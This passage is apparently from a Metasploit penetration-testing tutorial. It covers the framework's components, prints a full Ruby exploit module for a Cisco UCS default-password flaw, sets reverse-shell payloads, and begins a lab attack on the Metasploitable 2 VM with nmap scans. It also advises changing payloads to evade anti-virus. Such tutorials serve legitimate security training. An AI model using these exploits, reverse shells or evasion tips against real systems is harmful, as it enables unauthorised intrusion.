Metasploit also provides you with the option to use encoders that will encrypt the codes in such a way that it becomes obscure for the threat detection programs to interpret. They will self decrypt and become original codes when executed. However, the encoders are limited and the anti-virus has many signatures of them already in their databases. So, simply using an encoder will not guarantee anti-virus evasion. You might get past some of the anti-viruses simply using encoders though. You will have to get creative and experiment changing the payload so it does not get detected.

Components of Metasploit Framework

Metasploit is open-source and it is written in Ruby. It is an extensible framework, and you can build custom features of your likings using Ruby. You can also add different plugins. At the core of the Metaslpoit framework, there are some key components:

1. msfconsole
2. msfdb
3. msfvenom
4. meterpreter

Let’s talk about each of these components.

1. msfconsole

This is the command line interface that is used by the Metasploit Framework. It enables you to navigate through all the Metasploit databases at ease and use the required modules. This is the command that you entered before to get the Metasploit console.

2. msfdb

Managing all the data can become a hurdle real quick, which is why Metasploit Framework gives you the option to use PostgreSQL database to store and access your data quickly and efficiently. For example, you may store and organize your scan results in the database to access them later. You can take a look at this tutorial to learn more about this tool – https://null-byte.wonderhowto.com/how-to/use-metasploits-database-stay-organized-store-information-while-hacking-0192643/

3. msfvenom

This is the tool that mimics its name and helps you create your own payloads (venoms to inject in your victim machine). This is important since your payload might get detected as a threat and get deleted by threat detection software such as anti-viruses or anti-malware.

This happens because the threat detection systems already has stored fingerprints of many malicious payloads. There are some ways you can evade detection. We’ll discuss this in the later section dedicated to msfvenom.

4. meterpreter

meterpreter is an advanced payload that has a lot of functionalities built into it. It communicates using encrypted packets. Furthermore, meterpreter is quite difficult to trace and locate once in the system. It can capture screenshots, dump password hashes, and many more.

Metasploit location on the drive

Metasploit Framework is located in /usr/share/metasploit-framework/ directory. You can find out all about its components and look at the exploit and payload codes. You can also add your own exploits here to access it from the Metasploit console.

Let’s browse through the Metasploit directory:

cd /usr/share/metasploit-framework

Type in ls to see the contents of the directory:

ls

app                           msfconsole       Rakefile
config                        msfd             ruby
data                          msfdb            script-exploit
db                            msf-json-rpc.ru  script-password
documentation                 msfrpc           script-recon
Gemfile                       msfrpcd          scripts
Gemfile.lock                  msfupdate        tools
lib                           msfvenom         vendor
metasploit-framework.gemspec  msf-ws.ru
modules                       plugins

As you can see, there is a directory called modules, which should contain the exploits, payloads, auxiliaries, encoders, as discussed before. Let’s get into it:

cd modules

ls

auxiliary  encoders  evasion  exploits  nops  payloads  post

All the modules discussed are present here. However, evasion, nops, and post are the additional entries. The evasion module is a new entry to the Metasploit Framework, which helps create payloads that evade anti-virus (AV) detection. Nop stands for no operation, which means the CPU will just move to the next operation. Nops help create randomness in the payload – as adding them does not change the functionality of the program.

Finally, the post module contains some programs that you might require post-exploitation. For example, you might want to discover if the host you exploited is a Virtual Machine or a Physical Computer. You can do this with the checkvm module found in the post category. Now you can browse all the exploits, payloads, or others and take a look at their codes. Let’s navigate to the exploits directory and select an exploit. Then we’ll take a look at the codes of that exploit.

cd exploits

ls

aix        dialup                     firefox  mainframe  qnx
android    example_linux_priv_esc.rb  freebsd  multi      solaris
apple_ios  example.py                 hpux     netware    unix
bsd        example.rb                 irix     openbsd    windows
bsdi       example_webapp.rb          linux    osx

What you’re seeing now are the categories of the exploits. For example, the linux directory contains all the exploits that are available for Linux systems.

cd linux

ls

antivirus  games  imap   mysql     pptp   samba  ssh
browser    http   local  pop3      proxy  smtp   telnet
ftp        ids    misc   postgres  redis  snmp   upnp

Let’s take a look at the exploits for ssh.

cd ssh

ls

ceragon_fibeair_known_privkey.rb
cisco_ucs_scpuser.rb
exagrid_known_privkey.rb
f5_bigip_known_privkey.rb
ibm_drm_a3user.rb
loadbalancerorg_enterprise_known_privkey.rb
mercurial_ssh_exec.rb
microfocus_obr_shrboadmin.rb
quantum_dxi_known_privkey.rb
quantum_vmpro_backdoor.rb
solarwinds_lem_exec.rb
symantec_smg_ssh.rb
vmware_vdp_known_privkey.rb
vyos_restricted_shell_privesc.rb

As you can see, all the exploits are written in Ruby, and thus, the extension of the files is .rb. Now let’s look at the code of a specific exploit using the cat command, which outputs the content directly on the terminal:

cat cisco_ucs_scpuser.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Cisco UCS Director default scpuser password",
      'Description'    => %q{
        This module abuses a known default password on Cisco UCS Director. The 'scpuser'
        has the password of 'scpuser', and allows an attacker to login to the virtual appliance
        via SSH.
        This module  has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
        Note that Cisco also mentions in their advisory that their IMC Supervisor and
        UCS Director Express are also affected by these vulnerabilities, but this module
        was not tested with those products.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2019-1935' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-ucs-rce.txt' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload'        =>
        {
          'Compat' => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Cisco UCS Director < 6.7.2.0', {} ],
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2019-08-21'
    ))

    register_options(
      [
        Opt::RPORT(22),
        OptString.new('USERNAME', [true,  "Username to login with", 'scpuser']),
        OptString.new('PASSWORD', [true,  "Password to login with", 'scpuser']),
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def do_login(user, pass)
    factory = ssh_socket_factory
    opts = {
      :auth_methods    => ['password', 'keyboard-interactive'],
      :port            => rport,
      :use_agent       => false,
      :config          => false,
      :password        => pass,
      :proxy           => factory,
      :non_interactive => true,
      :verify_host_key => :never
    }

    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh
      conn = Net::SSH::CommandStream.new(ssh)
      ssh = nil
      return conn
    end

    return nil
  end

  def exploit
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']

    print_status("#{rhost}:#{rport} - Attempt to login to the Cisco appliance...")
    conn = do_login(user, pass)
    if conn
      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
      handler(conn.lsock)
    end
  end
end

You can see the code for the exploit is shown here. The green marked section is the description of the exploit and the yellow marked portion is the options that can be set for this exploit.

The description reveals what function this exploit will perform. As you can see, it exploits a known vulnerability of Cisco UCS Director. The vulnerability is the default password of the machine, which, if unchanged, may be used to gain access to the system. If you are someone who knows Ruby and has a good grasp of how the vulnerability works, you can modify the code and create your own version of the exploit. That’s the power of the Metasploit Framework.

In this way, you can also find out what payloads are there in your Metasploit Framework, add your own in the directory, and modify the existing ones.

Basic commands of Metasploit Framework

Now let’s move on to the fun stuff. In this section, we’ll talk about some of the basic Metasploit commands that you’re going to need all the time.

Fire up the Metasploit console by typing in msfconsole. Now you will see msf6 > indicating you’re in the interactive mode.

msfconsole

I have the msf6 shown here, where 6 represents the version of the framework and console. You can execute regular terminal commands from here as well, which means you don’t have to exit out of Metasploit Framework to perform some other tasks, making it super convenient. Here’s an example – msf6 > ls

[*] exec: ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos

The ls command works as it is intended to. You can use the help command to get a list of commands and their functions. Metasploit has very convenient help descriptions. They are divided into categories and easy to follow.

help

Now, let’s take a look at some important commands.

Show command

If you want to see the modules you currently have in your Metasploit Framework, you can use the show command. Show command will show you specific modules or all the modules. Show command requires an argument to be passed with it. Type in “show -h” to find out what argument the command takes:

show -h

[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options, favorites
[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions

For example, you can see all the exploits by using the command in the following way:

show exploits

This will list all the existing exploits, which will be a long list, needless to say. Let’s look at how many encoders are there:

show encoders

Show command can be used inside of any modules to get specific modules that are compatible. You’ll understand this better in the later sections.

Search anything within Metasploit

Let’s imagine you found a service running on an open port on the target machine. If you also know which version of the service that machine is using – you might want to look for already known vulnerabilities of that service.

How do you find out if that service has any vulnerability which has ready-made exploits on Metasploit?

You guessed it – you must use the search utility of Metasploit.

It doesn’t even have to be the exploits, you can also find out payloads, auxiliaries, etc., and you can search the descriptions as well.

Let’s imagine I wanted to find out if Metasploit has anything related to Samba. Samba is an useful cross platform tool that uses the SMB (Server Message Block) protocol. It allows file and other resource sharing between Windows and Unix based-host. Let’s use the search command:

search samba

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   0   exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   1   exploit/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   2   exploit/unix/misc/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   3   exploit/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   4   post/linux/gather/enum_configs                                        normal     No     Linux Gather Configurations
   5   auxiliary/scanner/rsync/modules_list                                  normal     No     List Rsync Modules
   6   exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   7   exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   8   exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
   9   exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   10  exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   11  auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal
   12  auxiliary/scanner/smb/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   13  exploit/linux/samba/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   14  exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   15  auxiliary/dos/samba/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow
   16  auxiliary/dos/samba/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow
   17  exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   18  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   19  exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   20  auxiliary/dos/samba/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow
   21  exploit/freebsd/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   22  exploit/linux/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   23  exploit/osx/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   24  exploit/solaris/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   25  exploit/windows/http/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow


Interact with a module by name or index. For example info 25, use 25 or use exploit/windows/http/sambar6_search_results 

You can also notice the date and description of the exploit. There is also a metric called rank telling you how good the exploit is. The name is actually also the path of where the module is inside the /usr/share/metasploit-framework/

There is some useful information for the exploits written in the Rank, Check, and Disclosure columns. The rank of an exploit indicates how reliable the exploit is. The check functionality for an exploit lets you check whether the exploit will work or not before actually running it on a host. The disclosure date is the date a particular exploit became publicly available. This is a good indicator of how many systems will be affected by it.

A relatively new exploit will affect many of the machines running the service since they might not have updated the vulnerable application in the short time period.

The use command

After you’ve chosen the module you want to use, you can select the module by the use command followed by the name or the id of the module. Let’s use the first one we got from the search result:

use exploit/unix/webapp/citrix_access_gateway_exec

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/webapp/citrix_access_gateway_exec) >

You can also specify the number for the module:

use 0

[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(unix/webapp/citrix_access_gateway_exec) > 

Get the description of the module with the info command

If you’re not sure about a module you can always get the description and see what it does. As we showed you earlier, you could get the description by looking at the original code of the module. However, we’re going to show you a much faster and efficient way. For this, you have to use the command info after you’ve entered the use command to select an exploit:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > info

       Name: Citrix Access Gateway Command Execution
     Module: exploit/unix/webapp/citrix_access_gateway_exec
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-12-21

Provided by:
  George D. Gal
  Erwin Paternotte

Available targets:
  Id  Name
  ‐‐  ‐‐‐‐
  0   Automatic

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
  Proxies                   no        A proxy chain of format typ
                                      e:host:port[,type:host:port
                                      ][...]
  RHOSTS                    yes       The target host(s), see htt
                                      ps://github.com/rapid7/meta
                                      sploit-framework/wiki/Using
                                      -Metasploit
  RPORT    443              yes       The target port (TCP)
  SSL      true             yes       Use SSL
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 127

Description:
  The Citrix Access Gateway provides support for multiple 
  authentication types. When utilizing the external legacy NTLM 
  authentication module known as ntlm_authenticator the Access Gateway 
  spawns the Samba 'samedit' command line utility to verify a user's 
  identity and password. By embedding shell metacharacters in the web 
  authentication form it is possible to execute arbitrary commands on 
  the Access Gateway.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2010-4566
  OSVDB (70099)
  http://www.securityfocus.com/bid/45402
  http://www.vsecurity.com/resources/advisory/20101221-1/

As you can see, the info command shows a detailed description of the module. You can see the description of what it does and what options to use, including explanations for everything. You can also use the show info command to get the same result.

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > show info

See the options you need to specify for the modules

For the modules, you will have to set some of the options. Some options will already be set. You will need to specify options like your target machine IP address, port, and things like this. The options will change according to what module you are using. You can see the options using the options or show options command. Let’s see this in action:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > options

Module options (exploit/unix/webapp/citrix_access_gateway_exec):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   Proxies                   no        A proxy chain of format ty
                                       pe:host:port[,type:host:po
                                       rt][...]
   RHOSTS                    yes       The target host(s), see ht
                                       tps://github.com/rapid7/me
                                       tasploit-framework/wiki/Us
                                       ing-Metasploit
   RPORT    443              yes       The target port (TCP)
   SSL      true             yes       Use SSL
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ‐‐‐‐   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   LHOST  10.0.2.15        yes       The listen address (an inter
                                     face may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

You can see the options for this specific exploit(unix/webapp/citrix_access_gateway_exec). You can also see the options for the default Payload (cmd/unix/reverse_netcat) for this exploit.

I have marked all the fields with different colors. The names are marked in green color. The current setting for each option is marked in pink. All of the fields are not required for the exploit to function. Some of them are optional. The mandatory ones will be listed as yes in the Required field marked in teal. Many of the options will be already filled out by default. You can either change them or keep them unchanged.

In this example, you can see the RHOSTS option does not have a current setting field value in it. This is where you will have to specify the target IP address. You will learn how to set it with the next command.

Use the set command to set a value to a variable

Set is one of the core commands of the Metasploit console. You can use this command to set context-specific values to a variable. For example, let’s try to set the target IP address for the above RHOSTS option field. Type in set RHOSTS [target IP]:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > set RHOSTS 192.168.43.111

RHOSTS => 192.168.43.111

Now we’ve successfully set up the value of the RHOSTS variable with the set command. Let’s check if it worked or not. Type in show options:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > show options

Module options (exploit/unix/webapp/citrix_access_gateway_exec):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.43.111   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             yes       Use SSL
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐

   LHOST  192.168.74.128   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

The output shows the RHOSTS variable or option has the target machine IP address that we specified using the set command.

Choose the Payload

After we’ve specified the required options for our exploit, we have to set up the payload that we’ll be sending after the exploit successfully completes. There are a lot of payloads in all of Metasploit database. However, after selecting the exploit, you will get the only payloads that are compatible with the exploit. Here, you can use the show command usefully to see the available payloads:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > show payloads

Compatible Payloads
===================

   #   Name                                      Disclosure Date  Rank    Check  Description
   -   ‐‐‐‐                                      ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐    ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0   payload/cmd/unix/bind_busybox_telnetd                      normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   1   payload/cmd/unix/bind_netcat                               normal  No     Unix Command Shell, Bind TCP (via netcat)
   2   payload/cmd/unix/bind_netcat_gaping                        normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   3   payload/cmd/unix/bind_netcat_gaping_ipv6                   normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   4   payload/cmd/unix/bind_socat_udp                            normal  No     Unix Command Shell, Bind UDP (via socat)
   5   payload/cmd/unix/bind_zsh                                  normal  No     Unix Command Shell, Bind TCP (via Zsh)
   6   payload/cmd/unix/generic                                   normal  No     Unix Command, Generic Command Execution
   7   payload/cmd/unix/pingback_bind                             normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   8   payload/cmd/unix/pingback_reverse                          normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   9   payload/cmd/unix/reverse_bash                              normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   10  payload/cmd/unix/reverse_bash_telnet_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   11  payload/cmd/unix/reverse_bash_udp                          normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   12  payload/cmd/unix/reverse_ksh                               normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   13  payload/cmd/unix/reverse_ncat_ssl                          normal  No     Unix Command Shell, Reverse TCP (via ncat)
   14  payload/cmd/unix/reverse_netcat                            normal  No     Unix Command Shell, Reverse TCP (via netcat)
   15  payload/cmd/unix/reverse_netcat_gaping                     normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   16  payload/cmd/unix/reverse_python                            normal  No     Unix Command Shell, Reverse TCP (via Python)
   17  payload/cmd/unix/reverse_socat_udp                         normal  No     Unix Command Shell, Reverse UDP (via socat)
   18  payload/cmd/unix/reverse_ssh                               normal  No     Unix Command Shell, Reverse TCP SSH
   19  payload/cmd/unix/reverse_zsh                               normal  No     Unix Command Shell, Reverse TCP (via Zsh)

Now you can choose any of the payloads that are listed. They are all compatible with the exploit. Let’s choose a different one rather than the default one. Here, we’ll use the set command to set the value of the payload variable to the name of the specific payload:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > set payload payload/cmd/unix/reverse_ssh

payload => cmd/unix/reverse_ssh

The output shows that the payload is set to (cmd/unix/reverse_ssh). Let’s set up the payload. Type in show options:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > show options

Module options (exploit/unix/webapp/citrix_access_gateway_exec):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.43.111   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             yes       Use SSL
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_ssh):

   Name   Current Setting  Required  Description
   ‐‐‐‐   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   LHOST  192.168.74.128   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

The option for the payload shows that the selected payload is now changed to our desired one (cmd/unix/reverse_ssh). You can set the payload options with the set command as well:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > set LPORT 5000
LPORT => 5000

Here, we’ve set the local port for listening to 5000 from the default 4444. Let’s see our changes in the options.

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > show options

Module options (exploit/unix/webapp/citrix_access_gateway_exec):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.43.111   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             yes       Use SSL
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_ssh):

   Name   Current Setting  Required  Description
   ‐‐‐‐   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   LHOST  192.168.74.128   yes       The listen address (an interface may be specified)
   LPORT  5000             yes       The listen port


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

Now that you’ve set up the exploit and the payload – you can start the fun. Let’s move on to the exploit commands.

Check if the exploit will work or not

Before going forward with the exploit, you might wonder if it is actually going to work or not. Let’s try to find out. We’ll have to use the “check” command to see the target host is vulnerable to the exploit we’ve set up –

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > check

[*] Attempting to detect if the Citrix Access Gateway is vulnerable...
[*] 192.168.43.111:443 - The target is not exploitable.

As you can see, the target we’re attacking is not vulnerable to this exploit. So there’s no point in continuing this line of attacking. In reality, you’ll mostly know if the machine has the vulnerability to the exploit you’re running beforehand. This is just an example to illustrate what is possible.

We’ll show you an example of an exploitable machine in the next section. Keep on reading!

A penetration test walkthrough

In this section, I’ll demonstrate how penetration testing is done. I will be using the intentionally vulnerable Linux machine – Metasploitable 2. This machine is created to have its port open and running vulnerable applications. You can get Metasploitable on rapid7’s website.

Go to this link and fill up the form to download. After downloading Metasploitable, you can set it up in a VirtualBox or a VMware or any software virtualization apps. If you’re using VMware workstation player, you can just load it up by double clicking the Metasploitable configuration file from the downloaded files.

Before we begin, a word of caution – Always remember that infiltrating any system without permission would be illegal. It’s better to create your own systems and practice hacking into them rather than learning to do it in real systems that might be illegal.

Target identification and Host discovery

Now we’ll be performing the first step in any penetration testing – gathering information about the target host. I’ve created the Metasploitable system inside my local area network. So, I already know the IP address of the target machine. You might want to find out IP address of the target host in your case. You can use DNS enumeration for that case. DNS enumeration is the way to find out the DNS records for a host. You can use nslookup, dig, or host command to perform DNS enumeration and get the IP address associated with a domain. If you have access to the machine, you can just find out the IP address of the machine. For checking if the host is up, you can just use the ping command or use nmap for host discovery.

In my case, I ran ifconfig command on my Metasploitable machine, and got the IP address to be 192.168.74.129. Let’s see if our attack machine can ping the victim machine:

nmap -sn 192.168.74.129

Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-07 03:43 EDT
Nmap scan report for 192.168.74.129
Host is up (0.00070s latency).
MAC Address: 00:0C:29:C9:1A:44 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

It’s clear that our attack machine can reach the victim machine. Let’s move on to the next step.

Port scanning & Service detection

This is the next step in the information gathering phase. Now we’ll find out what ports are open and which services are running in our victim machine. We’ll use nmap to run the service discovery:

nmap -sV 192.168.74.129

Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-07 03:47 EDT
Nmap scan report for 192.168.74.129
Host is up (0.0013s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:C9:1A:44 (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.37 seconds

As we can see, it’s party time for any penetration tester or hacker. There are too many ports open. The more open ports – the better the chance for one of the applications to be vulnerable. If you don’t know what we’re talking about, don’t worry. We’ve covered the scanning technique from the basics in a nmap tutorial that you can find here.

Vulnerability Analysis

Now that we’ve performed the service detection step, we know what versions of applications our victim is running. We just have to find out which one of them might be vulnerable. You can find out vulnerabilities just by googling about them, or you can also search them in your Metasploit database. Let’s do the latter, and search in Metasploit. Fire up your Metasploit console with the msfconsole command.

Let’s find out if the first application in the list, vsftpd 2.3.4 (which is an ftp service running on port 21) that we found in our service detection phase, has any exploits associated with it. Search for vsftpd in your Metasploit console:

search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ‐‐‐‐                                  ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐       ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

Whoa! The first one is already a hit. As you can see, the exploit rank is excellent and you can execute backdoor commands with this exploit. However, you must remember that this is metasploitable you’re attacking. In real systems, you will not find a lot of backdated applications with vulnerabilities. Let’s move on and check if the other applications are vulnerable or not. Try to see if the openssh has any vulnerabilities:

search openssh

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
